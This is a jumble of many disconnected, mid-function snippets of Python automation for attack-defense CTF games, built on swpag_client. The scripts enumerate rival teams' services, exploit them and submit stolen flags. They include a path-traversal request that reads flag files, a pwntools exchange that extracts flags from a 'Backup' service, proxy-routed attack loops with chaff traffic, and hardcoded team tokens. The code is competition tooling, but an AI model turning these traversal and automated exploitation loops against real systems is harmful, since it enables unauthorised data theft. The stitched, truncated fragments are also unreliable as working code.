print '[' + str(datetime.datetime.now().time()) + ']: ' + x def usage(): print "TODO: Enter our own host IP in this script!" print "python submit.py <http://team_interface> <flag_token> <service_name>" print "The actual exploit script should take parameters like as follows: " print "python <service_name>.py <hostname> <port> <flag_id>" sys.exit(1) if len(sys.argv) < 4: usage() # Create connection t = Team(sys.argv[1], sys.argv[2]) # Get service ID and ports services = t.get_service_list() service_id, service_port = 0, 0 for service in services: if service['service_name'] == sys.argv[3]: service_id = service['service_id'] service_port = service['port'] break log("Service ID : " + str(service_id)) log("Service Port: " + str(service_port)) # Sanity check the target ports targets = t.get_targets(service_id)
import json import requests from swpag_client import Team team = Team('http://34.211.129.130', 'WOfdkzdhsZEIlPEIai49') targets = team.get_targets(2) flags = [] for target in targets: print(target) url = f'http://{target["hostname"]}:{target["port"]}/?page=../append/{target["flag_id"]}.json' print(f'request url: {url}') resp = requests.get(url) print(f'response: {resp.text}') if "password" in resp.text: try: content = json.loads(resp.text) print(f'content: {content}') flags.append(content['password']) team.submit_flag([content['message']]) except Exception as e: print('some error occurred')
from swpag_client import Team from pprint import pprint t = Team("http://api.ictf2019.net/", "lVTU84h3IsWsv5Qa48Wv") pprint(t.get_service_list()) with open('services.txt', 'w') as fout: pprint(t.get_service_list(), fout)
class ProjectCTFAPI(): # This is just a simple wrapper class # See client.py for more methods supported by self.team __slots__ = ('team', 'debug') """ The Team class is your entrypoint into the API """ def __init__(self): self.debug = False self.team = Team(gameIp, teamToken) """ This returns all of the service ids in the game """ def getServices(self): ids = [] services = self.team.get_service_list() if self.debug: print("~" * 5 + " Service List " + "~" * 5) for s in services: ids.append(s['service_id']) if self.debug: print("Service %s: %s\n\t'%s'" % (s['service_id'], s['service_name'], s['description'])) return ids """ This returns a list of targets (ports, ips, flag ids) for the given service id """ def getTargets(self, service): targets = self.team.get_targets(service) if self.debug: print("~" * 5 + " Targets for service %s " % service + "~" * 5) for t in targets: for key in ['hostname','port','flag_id', 'team_name']: print("%10s : %s" % (key, t[key])) print("\n") return targets """ Submit an individual flag "FLGxxxxxxxx" or list of flags ["FLGxxxxxxxxx", "FLGyyyyyyyy", ...] """ def submitFlag(self, oneOrMoreFlags): if not isinstance(oneOrMoreFlags, list): oneOrMoreFlags = [oneOrMoreFlags] status = self.team.submit_flag(oneOrMoreFlags) if self.debug: for i, s in enumerate(status): print("Flag %s submission status: %s" % (oneOrMoreFlags[i], s)) return status
class ProjectCTFAPI(): # This is just a simple wrapper class # See client.py for more methods supported by self.team __slots__ = ('team', 'debug') """ The Team class is your entrypoint into the API """ def __init__(self, gameIp, teamToken): self.debug = False self.team = Team(gameIp, teamToken) """ This returns all of the service ids in the game """ def getServices(self): ids = [] services = self.team.get_service_list() if self.debug: print("~" * 5 + " Service List " + "~" * 5) for s in services: ids.append(s['service_id']) if self.debug: print("Service %s: %s\n\t'%s'" % (s['service_id'], s['service_name'], s['description'])) return ids """ This returns a list of targets (ports, ips, flag ids) for the given service id """ def getTargets(self, service): targets = self.team.get_targets(service) if self.debug: print("~" * 5 + " Targets for service %s " % service + "~" * 5) for t in targets: for key in ['hostname', 'port', 'flag_id', 'team_name']: print("%10s : %s" % (key, t[key])) print("\n") return targets """ Submit an individual flag "FLGxxxxxxxx" or list of flags ["FLGxxxxxxxxx", "FLGyyyyyyyy", ...] """ def submitFlag(self, oneOrMoreFlags): if not isinstance(oneOrMoreFlags, list): oneOrMoreFlags = [oneOrMoreFlags] status = self.team.submit_flag(oneOrMoreFlags) if self.debug: for i, s in enumerate(status): print("Flag %s submission status: %s" % (oneOrMoreFlags[i], s)) return status def getFLG(self, hostname, flagID): # Please change port id accordingly r = remote(hostname, 20003) #below is the exploit of Backup service of CTF3 # Please change the exploit interaction accordingly r.sendline('2') r.sendline(flagID) r.sendline('*') # Receive data from victim service # Use python regular expression to search flag rl = r.recvall(timeout=1) m = re.search('FLG[0-9A-Za-z]{13}', rl) # If no flag (service is patched), then close the remote connection and return none if m == None: r.close() return None # If find flag, print it, close the connection and send the flag back to main. FLG = m.group(0) print FLG r.close() return FLG
class PCTFAPI(): __slots__ = ('team') def __init__(self, game_url, team_token): self.team = Team(game_url, team_token) def getServiceNames(self): service_ids = [] services = self.team.get_service_list() for service in services: service_ids.append(service['service_id']) return service_ids def getTargets(self, service): targets = self.team.get_targets(service) return targets def getFLG(self, hostname, flagID): try: r = remote(hostname, 10001) except: print(hostname + ' is down ') return None r.sendline('2') r.sendline(flagID) r.sendline('*') rl = r.recvall(timeout=1) decoded_str = '' try: decoded_str = rl.decode('utf-8') print(decoded_str) except: print('bad response') return None m = re.search('FLG[0-9A-Za-z]{13}', decoded_str) if m == None: r.close() return None FLG = m.group(0) print('captured the flag') print(FLG) r.close() return FLG def submitFlag(self, flags): if not isinstance(flags, list): flags = [flags] status = self.team.submit_flag(flags) for i, s in enumerate(status): print("Flag %s submission status: %s" % (flags[i], s)) return status
def __init__(self, game_url, team_token): self.team = Team(game_url, team_token)
# 1after909 def attack_svc7(flag_id): print("running attack on service 7, flag id:", flag_id) flag = "" return flag # NOTE: update this whitelist for the attack functions above. # So we don't waste time executing stuff that's not done. implemented_attack_functions = {2} attack_functions = [ None, attack_svc1, attack_svc2, attack_svc3, attack_svc4, attack_svc5, attack_svc6, attack_svc7 ] team = Team("http://52.53.64.114", "C3U6ooCuCLGoTgzOqoO3") services = team.get_service_list() service_flag_ids = dict() while True: for service in services: if service['service_id'] not in implemented_attack_functions: print("skipping service", service['service_id'], ", attack function not implemented") continue print("Going to attack", service['service_name']) if service['service_name'] not in service_flag_ids: service_flag_ids[service['service_name']] = set() targets = team.get_targets(service['service_id']) for target in targets: flag_id = target['flag_id']
# This code was written 10 hours before the competition, yikes # Any bugs are your problem import socks # pip install PySocks import socket socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 4444) socket.socket = socks.socksocket from pwn import * # pip install pwntools from swpag_client import Team # pip install swpag_client import time import traceback import json import sys team = Team(None, "xxxxxxxxxxxxxxxxxxx") def team_ip(team_host): # 172.31.129.1 (team1) ... 172.31.129.254 (team254) ... 172.31.130.1 (team255) ... team_number = int(team_host[4:]) minor = ((team_number - 1) % 254) + 1 major = (team_number / 255) + 129 return '172.31.{major}.{minor}'.format(major=major, minor=minor) services = team.get_service_list() service_flag_ids = dict() while True:
NO_SUCH_FLAG = "incorrect" OWN_FLAG = "ownflag" ALREADY_SUBMITTED = "alreadysubmitted" ACCEPTED = "correct" TOO_MANY_INCORRECT = "toomanyincorrect" NOT_ACTIVE = "notactive" # Delays and timeouts REQUEST_TIMEOUT = 5 # HTTP Request timeouts (in seconds) RECONNECT_DELAY = 3 # Delay before attempting a new connection (in seconds) # Miscellaneous EXPLOIT_FOLDER = "exploits" # iCTF API team = Team(SUBMISSION_URL, X_TEAM_TOKEN) def is_valid_flag(flag): """ Checks if a string matches the flag format """ return True def remove_invalid_flags(flags): """ Takes a list of flags and removes flags with an invalid format Returns a list of valid flags (format-wise) """ # Validate flag format filtered_flags = [flag for flag in flags if is_valid_flag(flag)]
from swpag_client import Team from pprint import pprint t = Team("http://api.ictf2019.net/", "lVTU84h3IsWsv5Qa48Wv") pprint(t.get_team_status()) pprint(t.get_game_status())
def validate_flag(self,args): t = Team(None, "API_KEY") return t.submit_flag([args['flag']])
for service in services: service_ids.append(service['service_id']) return service_ids if __name__ == '__main__': # insert information: game_url, team_token, team_id game_url = "http://34.211.129.130" team_token = "WOfdkzdhsZEIlPEIai49" team_id = "9" #create team object team = Team(game_url, team_token) game_status = team.get_game_status() service_ids = get_service_ids(team) while True: for id in service_ids: id_string = str(id) service_state = game_status['service_states'][team_id][id_string]['service_state'] message = "TeamId: " + team_id + ", service_id: " + id_string + ", state: " + service_state print(message) # service_state can be "untested", "up", "down" if service_state == "down": print("Need recovery") backup_file_path = backup_map.get(id)
from swpag_client import Team t = Team("http://api.ictf2019.net/", "lVTU84h3IsWsv5Qa48Wv") vm_info = t.get_vm() print(vm_info.keys()) print(vm_info['ctf_key']) print(vm_info['ip']) print(vm_info['team_id'])
from swpag_client import Team t = Team("http://actf1.cse545.rev.fish/", "C8u0EDLS7oRLndF1u2TczzMgdDWQvtOS") game_stat = t.get_game_status() exp_srv = game_stat['exploited_services'] teams = t.get_team_list() t_status = t.get_team_status() tick_info = t.get_tick_info() time_to_tick = tick_info['approximate_seconds_left'] #print(t.get_game_status()) services = t.get_service_list() for service in services: print(service["service_id"]) targets = t.get_targets(service["service_id"]) for target in targets: print str(target)
from Exploit_2 import Exploit2 from Exploit_3 import Exploit3 from Exploit_4 import Exploit4 import random import threading import time from swpag_client import Team debug = True debug_chaff = False round_time_in_seconds = 10 chaff_to_real_ratio = 3 args_dict = {} # Connection to team Interfcae using swpag_client team = Team('http://34.211.129.130', "WOfdkzdhsZEIlPEIai49") # Submit flag def submit_flag(name, flag): status = team.submit_flag(flag) for i, s in enumerate(status): print("Flag %s submission status: %s" % (flag, s)) # launch 1 exploit and 3 chaff def launch_exploit(Exploit, ip, port, flagId, name, debug, debug_chaff): new_exploit = Exploit(ip, port, flagId, name, debug, debug_chaff) chaff_array = [False] * chaff_to_real_ratio chaff_array.append(True) random.shuffle(chaff_array)
import sys import os import time import os.path from swpag_client import Team from shutil import move if len(sys.argv) != 3: sys.exit("Please pass correct number of arguments. TEAM(IP(ARG1), FLAG_TOKEN(ARG2))") t = Team(sys.argv[1], sys.argv[2]) def submitStub(flags): list = [] for flag in flags: if flag in ['flagNAME69', 'flagNAME2']: list.append('correct') return list def submitFlags(flags): correct = 0 flagResponse = [] try: print(flags) flagResponse = t.submit_flag(flags) # flagResponse = submitStub(flags) except Exception: print ("Error submitting flags.") for response in flagResponse:
#!/usr/bin/env python2 # This code was written 10 hours before the competition, yikes # Any bugs are your problem import socks # pip install PySocks import socket socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 4444) socket.socket = socks.socksocket from pwn import * # pip install pwntools from swpag_client import Team # pip install swpag_client import time team = Team(None, "LtwpQ0sqDdYD5520beooZ2WhSeyyb69G") def team_ip(team_host): # 172.31.129.1 (team1) ... 172.31.129.254 (team254) ... 172.31.130.1 (team255) ... team_number = int(team_host[4:]) minor = ((team_number - 1) % 254) + 1 major = (team_number / 255) + 129 return '172.31.{major}.{minor}'.format(major=major, minor=minor) services = team.get_service_list() service_flag_ids = dict() while True: for service in services: print("Going to attack", service['service_name']) if service['service_name'] not in service_flag_ids:
break flag += c print(c, end="", flush=True) print() return flag #print("A:xpath", postbox1("https://ctf545.skizzerz.net", 443, "flag_asdfghjkl", path="/postbox")) #print("A:adminpw", postbox2("https://ctf545.skizzerz.net", 443, "flag_asdfghjkl")) #print("A:timing", postbox3("https://ctf545.skizzerz.net", 443, "flag_asdfghjkl")) #print("B:sql", pizza2("https://ctf545.skizzerz.net", 443, 1, path="/pizza")) #sys.exit(0) svcmap = {10001: [postbox1, postbox2, postbox3], 10002: [pizza1, pizza2]} team = Team(team_url, team_password) #cli = SSHClient() #cli.load_system_host_keys() #cli.set_missing_host_key_policy(paramiko.AutoAddPolicy) #cli.connect(ssh_ip, port=ssh_port, username=ssh_user, key_filename=ssh_keypath) prevtick = 0 services = team.get_service_list() while True: tick = team.get_tick_info() if tick["tick_id"] > prevtick: wait = True if prevtick == 0: wait = False prevtick = tick["tick_id"]
#!/usr/bin/env python2 # This code was written 10 hours before the competition, yikes # Any bugs are your problem import socks # pip install PySocks import socket socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 4444) socket.socket = socks.socksocket from pwn import * # pip install pwntools from swpag_client import Team # pip install swpag_client import time team = Team(None, "TEAM_KEY") def team_ip(team_host): # 172.31.129.1 (team1) ... 172.31.129.254 (team254) ... 172.31.130.1 (team255) ... team_number = int(team_host[4:]) minor = ((team_number - 1) % 254) + 1 major = (team_number / 255) + 129 return '172.31.{major}.{minor}'.format(major=major, minor=minor) services = team.get_service_list() service_flag_ids = dict() while True: for service in services:
def __init__(self): self.debug = False self.team = Team(gameIp, teamToken)
from swpag_client import Team t = Team("http://teaminterface.ictf.love/", "W7PMqeQCuYjVeL03UnV3") flags = ['FLGxxxxxxxxxxxxx'] print(t.submit_flag(flags))
from swpag_client import Team import sys from time import sleep import subprocess TICK = 30 MAX_SIZE = 100 exploit = sys.argv[2] service = sys.argv[1] t = Team("http://teaminterface.ictf.love/", "g7iCTu9Gt6pj1DCG4XwP") services = t.get_service_list() print(services) if service not in services: raise Exception("Check service name") while True: targets = ["diocane"] targets = t.get_targets(service) for target in targets: flags = subprocess.check_output([exploit, target]).decode("utf-8").split("\n") if len(flags) > MAX_SIZE: list_of_flags = [flags[:MAX_SIZE], flags[MAX_SIZE:]] else: list_of_flags = [flags] print(list_of_flags) for max_flags in list_of_flags: t.submit_flags(max_flags)
from collections import Counter import re import json from os.path import abspath, basename, dirname, join from multiprocessing import Pool NUM_TEAMS = 30 game_config_path = abspath(join(dirname(__file__), '..', '..', '..', 'game_config.json')) with open(game_config_path, 'r') as f: game_config = json.load(f) team_name = sys.argv[1] if len(sys.argv) > 1 else 'Shellphish' team_tokens = {t['name']: t['flag_token'] for t in game_config['teams']} team_token = team_tokens[team_name] t = Team('http://52.53.64.114/', team_token) SUBMITTED_FLAGS = {i: set() for i in range(NUM_TEAMS)} def do_submit(team_id): with open('/tmp/flags_{}'.format(team_id), 'rb') as f: s = f.read() flags = re.findall(b'FLG.{13}', s) flags = [f.decode() for f in flags] flags = [f for f in flags if f not in SUBMITTED_FLAGS[team_id]] len_non_unique = len(flags) flags = list(set(flags)) print("Unique: {}/{}".format(len(flags), len_non_unique)) results = [] for i in range(0, len(flags), 20):